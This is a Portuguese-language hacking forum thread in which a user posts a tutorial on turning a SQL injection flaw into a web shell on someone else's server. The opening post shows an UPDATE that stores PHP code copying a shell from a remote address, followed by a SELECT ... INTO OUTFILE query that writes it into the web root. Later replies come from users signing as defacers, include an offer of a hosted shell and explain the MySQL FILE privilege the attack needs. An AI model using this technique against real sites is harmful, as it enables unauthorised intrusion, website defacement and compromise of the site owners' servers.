Unconfigured Ad Widget

Collapse

Anúncio

Collapse
No announcement yet.

Ter acesso a Shell por SQL Injection

Collapse
X
 
  • Filter
  • Tempo
  • Show
Clear All
new posts

  • Font Size
    #1

    Tutorial Ter acesso a Shell por SQL Injection

    Vou passar um tutorial para vocês mais tipo ele não vai ser "receita de bolo" você tem que pelo menos saber o básico de PHP e SQL .

    Conseguiu achar uma vulnerabilidade em um site a SQL Injection? Otímo , não precisa mais do que isso.

    Certo ex_SheL$,mas e agora o que eu faço?

    Simples, você da um update em alguma row com o codigo que você quer executar, neste caso um em php que vai copiar a shell para dentro do servidor.

    <?php copy('http://endereçodashell','destino.php'); ?>
    Ficando assim como exemplo :

    'UPDATE tabela SET campo='<?php copy(Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... ?>\' WHERE id=qualqueridvalida

    Agora vem o importante,

    Você vai usar um comando SQL pouco conhecido o INTO OUTFILE , você terá que fazer uma query mais ou menos assim :

    SELECT campo FROM tabela WHERE id=amsmidquevcposantes INTO OUTFILE='caminhoprapastadosarquviosdoservidorweb+o nomedoaruivo(ex:/var/www/shellcopy.php)'
    Agora tudo que você precisa fazer é acessar a url do arquivo que você criou, neste caso Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...

    Pronto, seu comando php foi executado e sua shell foi copiada para dentro, é só usar!

    Só testei essa tecnica em servidores php com mysql, mas creio que ela possa ser adaptada para asp e asp.net + mssqlserver.

    Creio tambem que não fui muito claro, mais quem intendeu vai ser muito útil eu espero .

    Cordialmente,
    ex_SheL$
    Last edited by bolinhaxp; 08-12-2009, 13:03.

  • Font Size
    #2
    Bowa!! Bem Explicado!!
    Vlw a contribuição!
    Não te engane. De Deus não se zomba, o que o homem plantar, é o que ele vai colher. (Gálatas 6:7)


    sigpic


    Comment


    • Font Size
      #3
      Desconhecido ... .
      Nao Participa ainda ?
      * Comunidade Elite Defacer


      Elite Defacer
      Hackeralp - 5ubZer0 - $cr34m()

      Comment


      • Font Size
        #4
        Tem alguma shell ai que tu saiba que funciona pra gente testa?
        Pessoal, siga @sirbagda e fique sempre atualizado com materias, videos e afins do mundo hacker.

        Comment


        • Font Size
          #5
          Sim , SirBagda , acabei de hospedar uma para você ,

          Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...

          Espero que Gostem.

          Atenciosamente,
          ex_SheL$

          Comment


          • Font Size
            #6
            Gratz . . .
            Vlws por compartilhar . . .

            Comment


            • Font Size
              #7
              Thx very much =]
              rsrsrsrss
              Hackers Não são apenas modinhas, São divulgadores de informação.
              www.faroesteurbano.net

              sigpic
              Sem mais e sem menos!!

              Comment


              • Font Size
                #8
                Eu to achando que você é o dr4k3, lembro que ele ja postou isso...

                Comment


                • Font Size
                  #9
                  Não Twi John, eu não sou o dr4k3 mais se ele postou esse conteúdo eu não achei.E se ele postou me desculpe

                  Comment


                  • Font Size
                    #10
                    Postado Originalmente por Twi John Ver Post
                    Eu to achando que você é o dr4k3, lembro que ele ja postou isso...
                    tbm penssei que ele era o drake


                    Brazilians Defacers Ownz You

                    Comment


                    • Font Size
                      #11
                      muito bom vlw =D
                      -------------------------------------------------------------------------------------------






                      Comment


                      • Font Size
                        #12
                        Praticamente é achando a shell para ter acesso msm ..
                        muito bom ..
                        vlw
                        Nao Participa ainda ?
                        * Comunidade Elite Defacer


                        Elite Defacer
                        Hackeralp - 5ubZer0 - $cr34m()

                        Comment


                        • Font Size
                          #13
                          to tendo problemas nessa parte

                          "INTO OUTFILE='caminhoprapastadosarquviosdoservidorweb+o nomedoaruivo(ex:/var/www/shellcopy.php)' "

                          alguem pode explicar com mais detalhes oq significa
                          "caminhoprapastadosarquviosdoservidorweb+o nomedoaruivo"

                          obrigado.

                          Comment


                          • Font Size
                            #14
                            Hi.

                            Lembrando que o usuário do servidor MYSQL necessita ter privilégios de acesso FILE no sistema. Só assim funcionarão funções como INTO OUTFILE ou load_file().
                            Pena que a maioria dos servidores de hospedagem compartilhadores já desativem isso, visando que por padrão, já vem desabilitado no mysql. =P

                            []'s
                            Desenvolvedor Perl, PHP, .NET (C#, VB.NET, ASP.NET), Java (J2EE), Shell Script, JavaScript/Ajax, C, amante de Linux e noob.

                            twitter | last.fm

                            Comment


                            • Font Size
                              #15
                              será que vc poderia fazer uma video aula rapida só para demonstrar a tecnica?? obrigado

                              Comment

                              X
                              Working...
                              X